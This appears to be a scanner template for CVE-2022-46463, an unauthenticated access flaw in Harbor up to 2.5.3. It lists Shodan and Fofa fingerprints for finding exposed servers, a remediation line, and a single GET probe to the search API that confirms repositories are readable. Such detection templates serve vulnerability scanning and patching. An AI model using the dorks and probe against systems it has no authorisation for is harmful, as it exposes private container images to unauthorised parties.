漏洞描述
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
Shodan: http.favicon.hash:657337228
Fofa: icon_hash="657337228"
id: CVE-2022-46463
info:
name: Harbor <=2.5.3 - Unauthorized Access
author: Arm!tage
severity: high
description: |
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
Shodan: http.favicon.hash:657337228
Fofa: icon_hash="657337228"
remediation: |
Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-46463
- https://github.com/Vad1mo
- https://github.com/lanqingaa/123/blob/main/README.md
- https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d
tags: cve,cve2022,harbor,auth-bypass,exposure
created: 2023/10/14
rules:
r0:
request:
method: GET
path: /api/v2.0/search?q=/
expression: response.status == 200 && response.body.bcontains(b'repository_name') && response.body.bcontains(b'project_name')
expression: r0()